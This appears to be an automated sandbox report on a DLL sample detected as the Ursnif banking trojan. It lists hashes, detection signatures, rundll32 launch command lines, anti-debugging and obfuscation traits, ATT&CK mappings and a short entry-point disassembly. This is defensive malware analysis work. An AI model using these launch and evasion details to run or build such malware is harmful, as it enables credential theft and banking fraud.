Analysis Report c63f1121_by_Libranalysis

Overview

General Information

Sample Name:c63f1121_by_Libranalysis (renamed file extension from none to dll)
Analysis ID:412403
MD5:c63f11211f899e38c1c230594024950a
SHA1:4d5baeaf852156dbe8053a1c600c7d96049f5967
SHA256:70f617d8686bdc7d17d4f3b992a27f2532686815aaf5289841b87fd0c198ff3a

Detection

Ursnif
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Ursnif
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
PE file contains an invalid checksum
Program does not show much activity (idle)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6632 cmdline: loaddll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 6640 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6664 cmdline: rundll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6652 cmdline: rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Dark@@4 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6708 cmdline: rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Schoolpress@@8 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6724 cmdline: rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Triangleart@@8 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: c63f1121_by_Libranalysis.dll, Virustotal: Detection: 21%
Source: c63f1121_by_Libranalysis.dll, ReversingLabs: Detection: 10%
Source: c63f1121_by_Libranalysis.dll, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: c63f1121_by_Libranalysis.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\start\populate-Been\early\Cell.pdb source: loaddll32.exe, 00000001.00000002.967487955.000000006D55E000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.979819270.000000006D55E000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.973298703.000000006D55E000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.934749733.000000006D55E000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.945802512.000000006D55E000.00000002.00020000.sdmp, c63f1121_by_Libranalysis.dll
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D546773 FindFirstFileExW,FindNextFileW,FindClose,1_2_6D546773
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D5463B7 FindFirstFileExW,1_2_6D5463B7
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D546773 FindFirstFileExW,FindNextFileW,FindClose,3_2_6D546773
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D5463B7 FindFirstFileExW,3_2_6D5463B7
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D546773 FindFirstFileExW,FindNextFileW,FindClose,4_2_6D546773
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D5463B7 FindFirstFileExW,4_2_6D5463B7

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match, File source: 3.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match, File source: 3.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D502485 NtQueryVirtualMemory,3_2_6D502485
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D502485 NtQueryVirtualMemory,4_2_6D502485
Source: C:\Windows\System32\loaddll32.exe, Code function: String function: 6D548CA9 appears 32 times
Source: C:\Windows\System32\loaddll32.exe, Code function: String function: 6D52AEA0 appears 50 times
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 6D545A57 appears 44 times
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: String function: 6D52AEA0 appears 82 times
Source: c63f1121_by_Libranalysis.dll, Binary or memory string: OriginalFilenameCell.dll8 vs c63f1121_by_Libranalysis.dll
Source: classification engine, Classification label: mal56.troj.winDLL@11/0@0/0
Source: c63f1121_by_Libranalysis.dll, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown, Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll'
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll',#1
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Dark@@4
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll',#1
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Schoolpress@@8
Source: C:\Windows\System32\loaddll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\c63f1121_by_Libranalysis.dll,Triangleart@@8
Source: C:\Windows\SysWOW64\rundll32.exe, Automated click: OK
Source: c63f1121_by_Libranalysis.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: c63f1121_by_Libranalysis.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: c63f1121_by_Libranalysis.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: c63f1121_by_Libranalysis.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: c63f1121_by_Libranalysis.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: c63f1121_by_Libranalysis.dll, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: c63f1121_by_Libranalysis.dll, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: c63f1121_by_Libranalysis.dll, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: c63f1121_by_Libranalysis.dll, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: c63f1121_by_Libranalysis.dll, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: c63f1121_by_Libranalysis.dll, Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D501F31 LoadLibraryA,GetProcAddress,3_2_6D501F31
Source: c63f1121_by_Libranalysis.dll, Static PE information: real checksum: 0x792ff should be: 0x83549
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D504FE6 push ds; iretd 1_2_6D504FF6
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D509EF3 push esp; retf 1_2_6D509EF4
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D50887D push ss; retf 1_2_6D508881
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D50AAC5 push FFFF7185h; iretd 1_2_6D50AACA
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D52A5CF push ecx; ret 1_2_6D52A5E2
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D50532C push edi; iretd 1_2_6D50532D
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D502253 push ecx; ret 3_2_6D502263
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D502200 push ecx; ret 3_2_6D502209
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D52A5CF push ecx; ret 3_2_6D52A5E2
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D502253 push ecx; ret 4_2_6D502263
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D502200 push ecx; ret 4_2_6D502209
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D52A5CF push ecx; ret 4_2_6D52A5E2

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match, File source: 3.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\rundll32.exe, Process information set: NOOPENFILEERRORBOX
Source: all processes, Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D52AC9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6D52AC9F
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D545C5F mov eax, dword ptr fs:[00000030h] 1_2_6D545C5F
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D545C1B mov eax, dword ptr fs:[00000030h] 1_2_6D545C1B
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D545CD4 mov eax, dword ptr fs:[00000030h] 1_2_6D545CD4
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D545CA3 mov eax, dword ptr fs:[00000030h] 1_2_6D545CA3
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D545B66 mov eax, dword ptr fs:[00000030h] 1_2_6D545B66
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D545B0B mov eax, dword ptr fs:[00000030h] 1_2_6D545B0B
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D545AC8 mov eax, dword ptr fs:[00000030h] 1_2_6D545AC8
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D545A85 mov eax, dword ptr fs:[00000030h] 1_2_6D545A85
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D537381 mov eax, dword ptr fs:[00000030h] 1_2_6D537381
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D545C5F mov eax, dword ptr fs:[00000030h] 3_2_6D545C5F
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D545C1B mov eax, dword ptr fs:[00000030h] 3_2_6D545C1B
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D545CD4 mov eax, dword ptr fs:[00000030h] 3_2_6D545CD4
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D545CA3 mov eax, dword ptr fs:[00000030h] 3_2_6D545CA3
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D545B66 mov eax, dword ptr fs:[00000030h] 3_2_6D545B66
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D545B0B mov eax, dword ptr fs:[00000030h] 3_2_6D545B0B
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D537381 mov eax, dword ptr fs:[00000030h] 3_2_6D537381
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D545AC8 mov eax, dword ptr fs:[00000030h] 3_2_6D545AC8
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D545A85 mov eax, dword ptr fs:[00000030h] 3_2_6D545A85
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D545C5F mov eax, dword ptr fs:[00000030h] 4_2_6D545C5F
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D545C1B mov eax, dword ptr fs:[00000030h] 4_2_6D545C1B
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D545CD4 mov eax, dword ptr fs:[00000030h] 4_2_6D545CD4
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D545CA3 mov eax, dword ptr fs:[00000030h] 4_2_6D545CA3
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D545B66 mov eax, dword ptr fs:[00000030h] 4_2_6D545B66
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D545B0B mov eax, dword ptr fs:[00000030h] 4_2_6D545B0B
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D537381 mov eax, dword ptr fs:[00000030h] 4_2_6D537381
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D545AC8 mov eax, dword ptr fs:[00000030h] 4_2_6D545AC8
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D545A85 mov eax, dword ptr fs:[00000030h] 4_2_6D545A85
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D5369B4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6D5369B4
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D52B066 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_6D52B066
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D52AC9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6D52AC9F
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D5369B4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6D5369B4
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D52B066 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6D52B066
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D52AC9F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6D52AC9F
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D5369B4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_6D5369B4
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 4_2_6D52B066 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6D52B066
Source: rundll32.exe, 00000003.00000002.946005518.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.965930684.0000000003770000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.920545655.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.920545948.0000000003190000.00000002.00000001.sdmp, Binary or memory string: Program Manager
Source: rundll32.exe, 00000003.00000002.946005518.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.965930684.0000000003770000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.920545655.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.920545948.0000000003190000.00000002.00000001.sdmp, Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000003.00000002.946005518.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.965930684.0000000003770000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.920545655.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.920545948.0000000003190000.00000002.00000001.sdmp, Binary or memory string: Progman
Source: rundll32.exe, 00000003.00000002.946005518.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.965930684.0000000003770000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.920545655.0000000003190000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.920545948.0000000003190000.00000002.00000001.sdmp, Binary or memory string: Progmanlock
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D52AABF cpuid 1_2_6D52AABF
Source: C:\Windows\System32\loaddll32.exe, Code function: EnumSystemLocalesW,1_2_6D54ED30
Source: C:\Windows\System32\loaddll32.exe, Code function: EnumSystemLocalesW,1_2_6D54EDCB
Source: C:\Windows\System32\loaddll32.exe, Code function: EnumSystemLocalesW,1_2_6D54ECC7
Source: C:\Windows\System32\loaddll32.exe, Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_6D54EE56
Source: C:\Windows\System32\loaddll32.exe, Code function: EnumSystemLocalesW,1_2_6D548840
Source: C:\Windows\System32\loaddll32.exe, Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_6D54EA25
Source: C:\Windows\System32\loaddll32.exe, Code function: EnumSystemLocalesW,1_2_6D548740
Source: C:\Windows\System32\loaddll32.exe, Code function: GetLocaleInfoW,1_2_6D549163
Source: C:\Windows\System32\loaddll32.exe, Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_6D54F1CF
Source: C:\Windows\System32\loaddll32.exe, Code function: GetLocaleInfoW,1_2_6D54F0A9
Source: C:\Windows\System32\loaddll32.exe, Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_6D54F3A4
Source: C:\Windows\System32\loaddll32.exe, Code function: GetLocaleInfoW,1_2_6D54F2D5
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,3_2_6D501566
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: EnumSystemLocalesW,3_2_6D54ED30
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: EnumSystemLocalesW,3_2_6D54EDCB
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: EnumSystemLocalesW,3_2_6D54ECC7
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: EnumSystemLocalesW,3_2_6D548740
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: GetLocaleInfoW,3_2_6D549163
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6D54F1CF
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_6D54F3A4
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,3_2_6D54EA25
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,4_2_6D501566
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: EnumSystemLocalesW,4_2_6D54ED30
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: EnumSystemLocalesW,4_2_6D54EDCB
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: EnumSystemLocalesW,4_2_6D54ECC7
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: EnumSystemLocalesW,4_2_6D548740
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: GetLocaleInfoW,4_2_6D549163
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6D54F1CF
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_6D54F3A4
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_6D54EA25
Source: C:\Windows\System32\loaddll32.exe, Code function: 1_2_6D5491A2 GetSystemTimeAsFileTime,1_2_6D5491A2
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_6D50146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_6D50146C

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match, File source: 3.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match, File source: 3.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.rundll32.exe.6d500000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API 1 | Path Interception | Process Injection 12 | Rundll32 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 12 | LSASS Memory | Security Software Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | File and Directory Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | System Information Discovery 23 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior graph (ID: 412403, sample: c63f1121_by_Libranalysis, start date: 12/05/2021, architecture: WINDOWS, score: 56). Signatures: Multi AV Scanner detection for submitted file; Yara detected Ursnif. Process tree: loaddll32.exe started cmd.exe and three rundll32.exe processes; cmd.exe started rundll32.exe.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
c63f1121_by_Libranalysis.dll | 21% | Virustotal |
c63f1121_by_Libranalysis.dll | 11% | ReversingLabs | Win32.Trojan.Razy

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:32.0.0 Black Diamond
Analysis ID:412403
Start date:12.05.2021
Start time:17:12:28
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 53s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:c63f1121_by_Libranalysis (renamed file extension from none to dll)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal56.troj.winDLL@11/0@0/0
EGA Information:Failed
HDC Information:
  • Successful, ratio: 4.2% (good quality ratio 4%)
  • Quality average: 78.8%
  • Quality standard deviation: 29.2%
HCA Information:Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):6.694754169899549
TrID:
  • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
  • Generic Win/DOS Executable (2004/3) 0.20%
  • DOS Executable Generic (2002/1) 0.20%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:c63f1121_by_Libranalysis.dll
File size:482816
MD5:c63f11211f899e38c1c230594024950a
SHA1:4d5baeaf852156dbe8053a1c600c7d96049f5967
SHA256:70f617d8686bdc7d17d4f3b992a27f2532686815aaf5289841b87fd0c198ff3a
SHA512:acb47d73ee0ae648188d90ba65584e4261ca8c174305e30e7249d7c8daeccb7b1ac71d8c85d269077b1397adbd29e3deba99ffb89f24c02e8dccbefab14f556b
SSDEEP:12288:I5wfdldhr+GsAmRljPDeV1QlPqY5ExsETZCnMWxGuXPmEb8bVFaJ:I5adldhlDmfjPdglZCnR6jw
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...[.......7...P...7...@...R.......7...W...7...X...7...S...7...J...7.u.S...7...S...RichR...................PE..L..

File Icon

Icon Hash:74f0e4ecccdce0e4

Static PE Info

General

Entrypoint:0x102aa97
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x1000000
Subsystem:windows gui
Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
Time Stamp:0x6092A053 [Wed May 5 13:40:35 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:9c4dbee4f67fcf1f44b302fd37d240a5

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FE828F11C07h
call 00007FE828F12522h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007FE828F11AAAh
add esp, 0Ch
pop ebp
retn 000Ch
jmp 00007FE828F1F976h
push ebp
mov ebp, esp
and dword ptr [01088AA0h], 00000000h
sub esp, 24h
or dword ptr [010740ACh], 01h
push 0000000Ah
call 00007FE828F43CEBh
test eax, eax
je 00007FE828F11DAFh
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-1Ch]
mov dword ptr [ebp-0Ch], eax
xor edi, 6C65746Eh
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp-20h]
xor eax, 756E6547h
mov dword ptr [ebp-04h], eax
xor eax, eax
inc eax
push ebx
cpuid
mov esi, ebx
pop ebx
lea ebx, dword ptr [ebp-24h]
mov dword ptr [ebx], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebx+04h], esi
or eax, edi
or eax, dword ptr [ebp-08h]
mov dword ptr [ebx+08h], ecx
mov dword ptr [ebx+0Ch], edx
jne 00007FE828F11C45h
mov eax, dword ptr [ebp-24h]
and eax, 0FFF3FF0h
cmp eax, 000106C0h
je 00007FE828F11C25h
cmp eax, 00020660h
je 00007FE828F11C1Eh

Rich Headers

Programming Language:
  • [IMP] VS2008 SP1 build 30729

Data Directories

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x725e0 | 0x78 | .rdata |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x72658 | 0x50 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8a000 | 0x4a8 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8b000 | 0x2984 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x70d0c | 0x54 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
